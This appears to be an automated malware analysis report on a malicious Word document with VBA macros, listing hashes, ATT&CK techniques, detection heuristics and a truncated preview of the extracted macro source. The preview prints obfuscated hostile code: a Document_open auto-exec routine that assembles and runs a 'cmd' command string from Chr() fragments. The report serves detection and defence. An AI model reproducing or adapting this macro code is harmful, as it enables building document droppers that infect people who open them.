Office (OLE) malware analysis — malicious · 57320de2b60d84bf

MALICIOUS

Office (OLE)

169.2 KB Created: 2018-07-17 22:09:00 Authoring application: Microsoft Office Word First seen: 2018-07-23

MD5: 8cc4b64db9b4d5a60287772bd872b15e SHA-1: 46ba56ad313880a4df451192d079671dfbbec129 SHA-256: 57320de2b60d84bff2d0878d1f2d60ef012620a44fca86df7483a8cdd6f0c800

222 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates the use of the Shell() function, and the 'OLE_VBA_PCODE_AUTOEXEC_EXEC' heuristic confirms this is triggered by the Document_open macro. This suggests the macro is designed to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection further supports its malicious nature.

Heuristics 6

ClamAV: Doc.Malware.Valyria-6991411-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Malware.Valyria-6991411-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32245 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	32245 bytes
SHA-256: `12c00f635c66c1ab62d1a50fa5d029e3b472cdb992bd53d81e5d70d9000cc0d5`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "fQPFtmur" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function lCdpPSqztvXmY() fHBoJ = 87183 + Cmmbu + cWmwr / UwOQL + (4862 / ZVGkNu * jCkhEj * kzrCnX - 55560 + 39654 + JavQB - 33593) lzUVqP = SmtFVK - oJAwz / sWAGZ / vwjllO + 2887 - GvFqt - 95511 - MkwQZF OsBfY = PFRah - OwbpOa / CpiLO / SFYCS + 89198 - RacYWf - 8015 - LAjwU GPBuK = lifhn - FzqDz / qXnWCT / VwrpCM + 89389 - vzJAY - 68701 - fswqj fwsFD = MpsNZC - dujjRc / KPtaf / GwqRY + 20889 - RaFzYC - 13555 - FqrIki qmiTiw = 3785 + hUiam + rHIjw / OXfCF + (98858 / JSdYRl * rSFjGD * iGCwuj - 8762 + 66608 + HSSucT - 14040) RUwjRi = jjMiKo - tscUs / KwhCb / TsvZMk + 25608 - fXsWv - 31650 - LPwRN End Function Private Sub Document_open() On Error Resume Next DoRLwT = 59825 - jDCmW / 24875 * itUBq * (wfCSz / wqoimQ + IFMnh / BnmRX + RbBID - 85374 + EQEJPs / ciiuV) mjNpT = 30150 - MMuDoN / 86278 * KXptR * (zCEUwq / ZYTMsB + XbUAbG / iXilvn + CLtiw - 62418 + jJVVZn / obrwMB) rwGqL = 72615 - uUBWGj / 5116 * kDDqWz * (FLHJOW / FhjkC + CaDCkf / SDwSV + JbKiz - 2232 + LruiC / ciOUm) VNnwIf = 58069 - zAYYL / 12800 * WXUQXn * (sOvok / wRMAM + KjfLj / cTPWI + lwhtO - 43589 + MnEUYB / uMOhn) zzVXwsSiC = Application.Run("OuQiPLdb", "" + EUVFmjp + NiRfPvil + CVar("c") + LDEwzujtTIrw + OWjnzFTPlrv + TnBGsZ + wdsuFjZz + jRNTPpUVTs + oMjbQGbuR + hRBNHvY + VYZJH + pFKpsGCUju + XzPASs + cqqofcb + zMiJtjPiMY + tjwMhUS + UfUAofFwH + rJfLGKh + rwRiRlmjh + iKAAFriN + powNpuCmj) LjUANC = 76237 - iLzrJ / 51223 * KirJi * (ojtNaO / TRAlnZ + dfzro / JTBrzn + YkYuZM - 72066 + zamnn / kQKLDj) End Sub Function GZlqElFtz() kvijEH = 68196 - pVPvr / 73792 * XswPn * (ATkndR / dAvCuV + ZkRLW / wtfqq + PQUrEB - 67228 + kbwtbq / kpaNBW) oQQwVS = 81860 - JZzRX / 56485 * GCfVq * (TOYkwq / IFqnT + UjqML / UWNBL + NXtHf - 25153 + BGVCrO / bisDj) lwDMn = 3439 - vFvtpi / 14054 * JFJzX * (JncbmE / NMvBD + qkKjrJ / njnLD + AGKhZ - 22024 + WbLak / zNhsz) sKsIK = 64347 - qsqmXV / 32044 * iUkfNO * (cDaFoo / kWAoKU + zVhTaM / hwfMz + bjNvi - 20966 + ioiEso / HTmjL) nbntiz = 13254 - tziCZI / 16971 * ALjlwm * (jjLOE / doYwb + QRIAod / EwtnUb + jMqpir - 2660 + DMXlC / QIKDzb) ozmtQ = 66761 - TLwwSQ / 46442 * UbFka * (iMzsk / qPubLi + pZPTV / lzTQI + VSwQi - 77154 + iBFlm / jskDR) End Function Function iAVjoUfBQmc() mjSIjd = 61233 - zjnhkj / 7287 * RSFWXr * (bEEwta / fdrlBo + aMAwX / XMIOd + rlWFBI - 90988 + qDcfmC / DKqwf) AqYrNj = 92296 - MMZXmr / 37676 * LBBnf * (zrhGAE / MrYznz + NYBnF / GzIwGs + TYFvs - 1874 + rhKGj / HzVBYz) BnzOh = 75565 - CiiAH / 81103 * omcGm * (JjNvGO / GcGaGB + RkFjLN / pwbFZ + ALiZR - 24867 + JVZDI / CQZcI) upDjv = 90151 - YUilq / 64564 * kuthI * (lmwKBY / LmPWTL + GLICd / orpmn + aGRVj - 90126 + zVIss / XCNmEM) UaUdXz = 54829 - mLXSUo / 91024 * wuMRis * (KvCGs / CbQVo + uJZCz / mKwwVi + ArmPP - 37797 + bSJiV / khjkGz) EmNtX = 24484 - minOz / 18551 * BNZOQu * (wQZtP / dBUMi + pQjjB / oBmls + ZbVdD - 51120 + MiwHWo / IwqkJb) rGFYAc = 38604 - vpURi / 14171 * XpcFz * (WkUMU / UBSQw + wtQzc / TUaHm + UTzum - 2143 + ZQjUW / MfRzOd) tGLboA = 58851 - NEAvY / 6108 * jtDjlF * (tEczBU / WALjA + EzbvC / ZRwUo + RnVWi - 86232 + izMHzq / KjqDpL) End Function Attribute VB_Name = "JTQqUOV" Function TnBGsZ() On Error Resume Next UFZwKw = 8213 - 31240 * (htTpKl / 67806 * vGHnDS * EVGCHz - (99860 - aNzLi + 26993 / fSzjT)) CnEdji = (2332 * UsWwv / KhkGFs - REKid / NRBwS - piCkkG) XYUlTLc = CStr(Chr(QIodlZJHlAXY + noLhGwzbTvVaE + 109 + PGuwNzaahs + RUdTuEORSD)) + "d /" + CStr(Chr(ThopsIKV + WtccfrMOdpFa + 99 + qcaVqnEL + djKkiZhfTjwj)) + " fo" + "R " + "; /" + "^" + "f" + " " + " , " + CStr(Chr(ZWEEatEtw + QiofRjKWrwwhcf + 34 + ZGCIHlHw + zlijjhclSrsA)) + " d" WjnQor = 73798 - 21474 * (KRTPK / 33778 * iAtoo * DQsUhW - (85444 - DjCEJo + 77178 / BfMfz)) itTqpz = 455 ... (truncated)

SHA-256: 12c00f635c66c1ab62d1a50fa5d029e3b472cdb992bd53d81e5d70d9000cc0d5

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "fQPFtmur"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function lCdpPSqztvXmY()
   fHBoJ = 87183 + Cmmbu + cWmwr / UwOQL + (4862 / ZVGkNu * jCkhEj * kzrCnX - 55560 + 39654 + JavQB - 33593)
   lzUVqP = SmtFVK - oJAwz / sWAGZ / vwjllO + 2887 - GvFqt - 95511 - MkwQZF
   OsBfY = PFRah - OwbpOa / CpiLO / SFYCS + 89198 - RacYWf - 8015 - LAjwU
   GPBuK = lifhn - FzqDz / qXnWCT / VwrpCM + 89389 - vzJAY - 68701 - fswqj
   fwsFD = MpsNZC - dujjRc / KPtaf / GwqRY + 20889 - RaFzYC - 13555 - FqrIki
   qmiTiw = 3785 + hUiam + rHIjw / OXfCF + (98858 / JSdYRl * rSFjGD * iGCwuj - 8762 + 66608 + HSSucT - 14040)
   RUwjRi = jjMiKo - tscUs / KwhCb / TsvZMk + 25608 - fXsWv - 31650 - LPwRN
End Function
Private Sub Document_open()
On Error Resume Next
   DoRLwT = 59825 - jDCmW / 24875 * itUBq * (wfCSz / wqoimQ + IFMnh / BnmRX + RbBID - 85374 + EQEJPs / ciiuV)
   mjNpT = 30150 - MMuDoN / 86278 * KXptR * (zCEUwq / ZYTMsB + XbUAbG / iXilvn + CLtiw - 62418 + jJVVZn / obrwMB)
   rwGqL = 72615 - uUBWGj / 5116 * kDDqWz * (FLHJOW / FhjkC + CaDCkf / SDwSV + JbKiz - 2232 + LruiC / ciOUm)
   VNnwIf = 58069 - zAYYL / 12800 * WXUQXn * (sOvok / wRMAM + KjfLj / cTPWI + lwhtO - 43589 + MnEUYB / uMOhn)
zzVXwsSiC = Application.Run("OuQiPLdb", "" + EUVFmjp + NiRfPvil + CVar("c") + LDEwzujtTIrw + OWjnzFTPlrv + TnBGsZ + wdsuFjZz + jRNTPpUVTs + oMjbQGbuR + hRBNHvY + VYZJH + pFKpsGCUju + XzPASs + cqqofcb + zMiJtjPiMY + tjwMhUS + UfUAofFwH + rJfLGKh + rwRiRlmjh + iKAAFriN + powNpuCmj)
   LjUANC = 76237 - iLzrJ / 51223 * KirJi * (ojtNaO / TRAlnZ + dfzro / JTBrzn + YkYuZM - 72066 + zamnn / kQKLDj)
End Sub
Function GZlqElFtz()
   kvijEH = 68196 - pVPvr / 73792 * XswPn * (ATkndR / dAvCuV + ZkRLW / wtfqq + PQUrEB - 67228 + kbwtbq / kpaNBW)
   oQQwVS = 81860 - JZzRX / 56485 * GCfVq * (TOYkwq / IFqnT + UjqML / UWNBL + NXtHf - 25153 + BGVCrO / bisDj)
   lwDMn = 3439 - vFvtpi / 14054 * JFJzX * (JncbmE / NMvBD + qkKjrJ / njnLD + AGKhZ - 22024 + WbLak / zNhsz)
   sKsIK = 64347 - qsqmXV / 32044 * iUkfNO * (cDaFoo / kWAoKU + zVhTaM / hwfMz + bjNvi - 20966 + ioiEso / HTmjL)
   nbntiz = 13254 - tziCZI / 16971 * ALjlwm * (jjLOE / doYwb + QRIAod / EwtnUb + jMqpir - 2660 + DMXlC / QIKDzb)
   ozmtQ = 66761 - TLwwSQ / 46442 * UbFka * (iMzsk / qPubLi + pZPTV / lzTQI + VSwQi - 77154 + iBFlm / jskDR)
End Function
Function iAVjoUfBQmc()
   mjSIjd = 61233 - zjnhkj / 7287 * RSFWXr * (bEEwta / fdrlBo + aMAwX / XMIOd + rlWFBI - 90988 + qDcfmC / DKqwf)
   AqYrNj = 92296 - MMZXmr / 37676 * LBBnf * (zrhGAE / MrYznz + NYBnF / GzIwGs + TYFvs - 1874 + rhKGj / HzVBYz)
   BnzOh = 75565 - CiiAH / 81103 * omcGm * (JjNvGO / GcGaGB + RkFjLN / pwbFZ + ALiZR - 24867 + JVZDI / CQZcI)
   upDjv = 90151 - YUilq / 64564 * kuthI * (lmwKBY / LmPWTL + GLICd / orpmn + aGRVj - 90126 + zVIss / XCNmEM)
   UaUdXz = 54829 - mLXSUo / 91024 * wuMRis * (KvCGs / CbQVo + uJZCz / mKwwVi + ArmPP - 37797 + bSJiV / khjkGz)
   EmNtX = 24484 - minOz / 18551 * BNZOQu * (wQZtP / dBUMi + pQjjB / oBmls + ZbVdD - 51120 + MiwHWo / IwqkJb)
   rGFYAc = 38604 - vpURi / 14171 * XpcFz * (WkUMU / UBSQw + wtQzc / TUaHm + UTzum - 2143 + ZQjUW / MfRzOd)
   tGLboA = 58851 - NEAvY / 6108 * jtDjlF * (tEczBU / WALjA + EzbvC / ZRwUo + RnVWi - 86232 + izMHzq / KjqDpL)
End Function


Attribute VB_Name = "JTQqUOV"
Function TnBGsZ()
On Error Resume Next
UFZwKw = 8213 - 31240 * (htTpKl / 67806 * vGHnDS * EVGCHz - (99860 - aNzLi + 26993 / fSzjT))
   CnEdji = (2332 * UsWwv / KhkGFs - REKid / NRBwS - piCkkG)
XYUlTLc = CStr(Chr(QIodlZJHlAXY + noLhGwzbTvVaE + 109 + PGuwNzaahs + RUdTuEORSD)) + "d /" + CStr(Chr(ThopsIKV + WtccfrMOdpFa + 99 + qcaVqnEL + djKkiZhfTjwj)) + " fo" + "R  " + "; /" + "^" + "f" + " " + " , " + CStr(Chr(ZWEEatEtw + QiofRjKWrwwhcf + 34 + ZGCIHlHw + zlijjhclSrsA)) + " d"
WjnQor = 73798 - 21474 * (KRTPK / 33778 * iAtoo * DQsUhW - (85444 - DjCEJo + 77178 / BfMfz))
   itTqpz = 455
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.